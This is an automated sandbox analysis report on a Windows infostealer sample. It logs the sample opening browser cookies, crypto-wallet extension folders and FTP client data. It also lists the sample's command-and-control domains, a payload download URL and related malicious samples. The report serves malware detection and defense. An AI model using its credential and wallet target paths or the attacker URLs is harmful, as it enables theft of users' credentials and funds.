                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\AFWAAFRXKO
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\AIXACVYBSB
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\CURQNKVOIX
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\KATAXZVCPS
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\KZWFNRXYKI
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\MNULNCRIYC
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\NHPKIZUUSG
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\PSAMNLJHZW
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\QVTVNIBKSD
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: C:\Users\user\Documents\SQRKHNBNYN
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: number of queries: 1001
                Source: Yara match | File source: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: OtHVIQ2ge4.exe PID: 7832, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: OtHVIQ2ge4.exe PID: 7832, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                ATT&CK tactics and techniques (the number of matching signatures is given in parentheses):
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection (2); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (2); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223); Wi-Fi Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection (submitted sample)

Source | Detection | Scanner | Label | Link
OtHVIQ2ge4.exe | 55% | ReversingLabs | Win32.Infostealer.Tinba |
OtHVIQ2ge4.exe | 100% | Avira | TR/Crypt.TPM.Gen |
OtHVIQ2ge4.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus detection (URLs)

Source | Detection | Scanner | Label | Link
https://observerfry.lat/api-Age | 0% | Avira URL Cloud | safe |
https://observerfry.lat/s | 0% | Avira URL Cloud | safe |
https://observerfry.lat/ry | 0% | Avira URL Cloud | safe |
https://observerfry.lat/apip | 0% | Avira URL Cloud | safe |
https://observerfry.lat/Uu | 0% | Avira URL Cloud | safe |
https://observerfry.lat/apik | 0% | Avira URL Cloud | safe |
https://observerfry.lat:443/apin.txtPK | 0% | Avira URL Cloud | safe |
https://observerfry.lat/RC | 0% | Avira URL Cloud | safe |
https://observerfry.lat:443/api | 0% | Avira URL Cloud | safe |
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe |
https://dz8aopenkvv6s.cloudfront.net | 0% | Avira URL Cloud | safe |
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.217.75.84 | true | false | | high
bitbucket.org | 185.166.143.49 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
observerfry.lat | 104.21.36.201 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high

Domains and URLs from the malware configuration / contacted URLs

Name | Malicious | Antivirus Detection | Reputation
slipperyloo.lat | false | | high
curverpluch.lat | false | | high
tentabatte.lat | false | | high
manyrestro.lat | false | | high
bashfulacid.lat | false | | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high
observerfry.lat | false | | high
wordyfindy.lat | false | | high
https://observerfry.lat/api | false | | high
shapestickyr.lat | false | | high
talkynicer.lat | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
52.217.75.84 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02 (US) | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02 (US) | false
104.21.36.201 | observerfry.lat | United States | 13335 | CLOUDFLARENET (US) | false
General information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579973
Start date and time: 2024-12-23 17:20:00 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
                                                                                                                                Sample name:OtHVIQ2ge4.exe
                                                                                                                                renamed because original name is a hash value
                                                                                                                                Original Sample Name:4ba0641b1f9224605df854c9baaa5dcf.exe
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                EGA Information:Failed
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 100%
                                                                                                                                • Number of executed functions: 0
                                                                                                                                • Number of non-executed functions: 3
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.12.23.50, 20.190.147.4
                                                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target OtHVIQ2ge4.exe, PID 7832 because there are no executed function
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                • VT rate limit hit for: OtHVIQ2ge4.exe
Time | Type | Description
11:20:56 | API Interceptor | 24x Sleep call for process: OtHVIQ2ge4.exe modified
11:21:49 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.166.143.49 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher | jasonj002.bitbucket.io/
104.21.36.201 | fr2Mul3G6m.exe | malicious | LummaC |
104.21.36.201 | zLP3oiwG1g.exe | malicious | LummaC |
104.21.36.201 | Yh6fS6qfTE.exe | malicious | LummaC |
104.21.36.201 | ABnDy7rLFS.exe | malicious | LummaC, Stealc |
104.21.36.201 | skIYOAOzvU.exe | malicious | LummaC |
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          bitbucket.orgpayment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 185.166.143.48
                                                                                                                                          FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.50
                                                                                                                                          BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.48
                                                                                                                                          jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.48
                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.50
                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          s3-w.us-east-1.amazonaws.compayment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 3.5.29.153
                                                                                                                                          FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 3.5.25.82
                                                                                                                                          BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 3.5.29.90
                                                                                                                                          jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 52.216.152.124
                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 52.217.136.89
                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 16.182.101.249
                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 52.217.67.100
                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 52.217.18.140
                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 52.217.203.57
                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 3.5.16.86
                                                                                                                                          s-part-0035.t-0009.t-msedge.netPayout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          G3izWAY3Fa.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 13.107.246.63
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          AMAZON-02USChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 3.160.188.50
                                                                                                                                          Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 52.89.58.139
                                                                                                                                          https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                          • 44.226.126.181
                                                                                                                                          payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 185.166.143.48
                                                                                                                                          https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70Get hashmaliciousHtmlDropperBrowse
                                                                                                                                          • 13.56.148.153
                                                                                                                                          https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                          • 76.223.125.47
                                                                                                                                          R2-Signed.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                          • 18.139.89.40
                                                                                                                                          TsWpfWrp.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                          • 52.74.204.186
                                                                                                                                          Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                          • 3.5.232.230
                                                                                                                                          Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                          • 3.5.232.130
                                                                                                                                          CLOUDFLARENETUSfr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.36.201
                                                                                                                                          ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.199.72
                                                                                                                                          SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 104.21.67.152
                                                                                                                                          Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.18.95.41
                                                                                                                                          http://tax-com.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.203.198
                                                                                                                                          https://www.cocol88.site/l6v3z.phpGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.63.207
                                                                                                                                          https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.69.226
                                                                                                                                          AMAZON-02USfr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.166.143.49
                                                                                                                                          ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 3.160.188.50
                                                                                                                                          Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 52.89.58.139
                                                                                                                                          https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                          • 44.226.126.181
                                                                                                                                          payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 185.166.143.48
                                                                                                                                          https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70Get hashmaliciousHtmlDropperBrowse
                                                                                                                                          • 13.56.148.153
                                                                                                                                          https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                          • 76.223.125.47
R2-Signed.exe | Get hash | malicious | ValleyRAT | Browse
• 18.139.89.40
TsWpfWrp.exe | Get hash | malicious | ValleyRAT | Browse
• 52.74.204.186
Archivo-PxFkiLTWYG-23122024095010.hta | Get hash | malicious | Unknown | Browse
• 3.5.232.230
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | fr2Mul3G6m.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
t8cdzT49Yr.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
